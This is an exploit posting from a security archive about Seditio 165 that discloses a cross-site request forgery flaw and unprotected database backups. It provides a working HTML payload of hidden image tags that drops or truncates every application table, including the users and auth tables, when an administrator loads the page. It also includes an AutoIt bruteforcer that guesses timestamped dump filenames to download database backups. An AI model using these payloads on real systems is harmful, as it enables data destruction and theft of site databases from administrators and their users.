what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Seditio 165 Cross Site Request Forgery / Backup Disclosure

Seditio 165 Cross Site Request Forgery / Backup Disclosure
Posted Apr 9, 2012
Authored by Akastep

Seditio version 165 suffers from backup disclosure and cross site request forgery vulnerabilities.

tags | exploit, vulnerability, csrf
SHA-256 | 5960cd105a7a7f241b28be92c2caf2fb8fc300ccc5aa6c11a5a691fd0b93b28f

Seditio 165 Cross Site Request Forgery / Backup Disclosure

Change Mirror Download
=============================================
Vulnerable Software: Seditio v165
Downloaded from: http://seditio-eklenti.com/datas/users/1-seditio.165.rar
(This version is under development of Kaan)

$ md5sum 1-seditio.165.rar
2eebc8d80f7fcd4e9a0d0659ef193488 *1-seditio.165.rar
=============================================
Vuln Desc:
Seditio 165 is prone to CROSS SITE REQUEST FORGERY vuln.
*Because in administration section it uses
T3 DB Tools v1.6 without any $_GET tokenization this is possible without any problem to exploitate CSRF against application and destroy/truncate
database tables*
*Second issuse is seditio 165 stores database dump files in unsafe manner(See below)*
==============================================
Tested:
*php.ini MAGIC_QUOTES_GPC OFF*
Safe mode off
/*
OS: Windows XP SP2 (32 bit)
Apache: 2.2.21.0
PHP Version: 5.2.17.17
mysql> select version()
-> ;
+-----------+
| version() |
+-----------+
| 5.5.21 |
+-----------+
*/
=================================================


@Print screen after succesfully CSRF attack:
http://s019.radikal.ru/i601/1204/1b/90552af729ad.png


====================== Seditio 165 Drop/truncate Database tables using CSRF vuln ===================================
<h1>Seditio 165 Drop Database tables using CSRF vuln<br>
Because usage of T3 DB Tools v1.6 without any $_GET tokenization in administration section.</h1>

<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_forum_posts" width="0" height="0"></img>
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_forum_sections" width="0" height="0"></img>
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_forum_structure" width="0" height="0"></img>
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_forum_topics" width="0" height="0"></img>
<img src="http://192.168.0.15/learn/128/sed/seditio165/t/admin.php?m=dbtools&a=drop&table=sed_logger" width="0" height="0"></img>
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_pages" width="0" height="0"></img>
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_pfs_folders" width="0" height="0"></img>
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_pm" width="0" height="0"></img>
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_polls" width="0" height="0"></img>
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_polls_options" width="0" height="0"></img>
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_polls_voters" width="0" height="0"></img>
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_redirecter" width="0" height="0"></img>
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_trash" width="0" height="0"></img>
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_referers" width="0" height="0"></img>
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_auth" width="0" height="0"></img>
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_banlist" width="0" height="0"></img>
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_com" width="0" height="0"></img>
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_plugins" width="0" height="0"></img>
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_users" width="0" height="0"></img>
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_online" width="0" height="0"></img>
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_config" width="0" height="0"></img>
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_core" width="0" height="0"></img>
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_groups_users" width="0" height="0"></img>
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_cache" width="0" height="0"></img>
<!--IDEA! CTRL+H http://192.168.0.15/learn/128/sed/seditio165/ to target :D-->
====================== EOF Seditio 165 Drop Database tables using CSRF vuln ===================================

You can change &a=drop to truncate statement too
In ex:
<img src="http://CHANGE_TO_RTARGEt/admin.php?m=dbtools&a=truncate&table=sed_forum_posts" width="0" height="0"></img>

Another issuse is: # Theris No .htaccess file to protect database dump files from world (Hint .htaccess =>deny from all<=)

me@localhost.localdomain /cygdrive/c/Program Files/Apache Software Foundation/Apache2.2/htdocs/learn/128/sed/seditio165/datas/backups
# ls -lia
total 93
562949953537506 drwxrwxrwx+ 1 mehere ???????? 0 Apr 7 03:08 .
1407374883669468 drwxrwxrwx+ 1 mehere ???????? 0 Apr 7 03:02 ..
562949953537507 -rwxrwxrwx+ 1 mehere ???????? 370 Feb 12 21:39 index.php
1970324837100442 -rwx------+ 1 ???????? ???????? 91031 Apr 7 03:08 sed165_04.07.12-030823.sql <=== this is my dump


me@localhost.localdomain /cygdrive/c/Program Files/Apache Software Foundation/Apache2.2/htdocs/learn/128/sed/seditio165/datas/backups
# pwd
/cygdrive/c/Program Files/Apache Software Foundation/Apache2.2/htdocs/learn/128/sed/seditio165/datas/backups

me@localhost.localdomain /cygdrive/c/Program Files/Apache Software Foundation/Apache2.2/htdocs/learn/128/sed/seditio165/datas/backups
#


Since database dump potentially world readable this is possible to bruteforce for existing database dump(s) and steal it.
From scratch and a bit lame but works for me at least it is Proof of concept:
@Print screen bruteforce result:
http://s019.radikal.ru/i614/1204/af/a16616428e18.png


==================== Bruteforcer to find existing database dump file for seditio 165 ==========================
#include <inet.au3>


$prefix='sed165_'; db prefix in most cases sed_

$il='2012'; start year
$ay='04' ; start month
$gun='07'; start day
$site='http://192.168.0.15/learn/128/sed/seditio165/datas/backups/'; //target site


#cs
DO not touch
#ce


$saniye=00;
$deqiqe=00;
$saat=03;
;~ $gun='01'

$il=StringMid($il,3,StringLen($il))

while 1

Sleep(10);
$saniye+=1;
if $saniye >59 Then
$saniye='00'
$deqiqe+=1;
EndIf

if $deqiqe <10 Then
$deqiqe='0' & StringMid($deqiqe,StringLen($deqiqe),1)
EndIf

if $deqiqe >59 Then
$deqiqe='00';
$saat+=1;
EndIf

if $saat <10 Then
$saat='0' & StringMid($saat,StringLen($saat),1)
EndIf

if $saat >23 Then
$saat='00'
$gun+=1;
EndIf

if $gun <10 Then
$gun='0' & StringMid($gun,StringLen($gun),1)
EndIf

if $gun >31 Then
$gun='01';
$ay+=1;
EndIf

if $ay <10 Then
$ay='0' & StringMid($ay,StringLen($ay),1)
EndIf

if $ay >12 Then
$ay='01';
$il+=1;
EndIf


if $saniye <10 Then
$saniye='0' & StringMid($saniye,1,1);
EndIf

;~ format of dumpfile sed165_04.07.12-030823.sql
$fetchitifexists=$prefix & $ay & '.' & $gun & '.' & $il & '-' & $saat & $deqiqe & $saniye &'.sql' & @CRLF
ConsoleWrite('Verifying ' & $fetchitifexists & @CRLF);

if StringInStr(_INetGetSource($site & $fetchitifexists,TRUE),'-- T3 DB Tools',0) Then
MsgBox(0,"Check it out",$site & $fetchitifexists,10)

FileWrite(@ScriptDir &"\wohoooo.txt",$site & $fetchitifexists & @CRLF)
$confirm=MsgBox(65,"Exit or continue?","Exit or Continue?")
if $confirm=1 Then
MsgBox(48,"Bye","Byeeee xD");
Exit
EndIf
EndIf


WEnd


========================== EOF bruteforcer ============================================================




/AkaStep ^_^
















Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close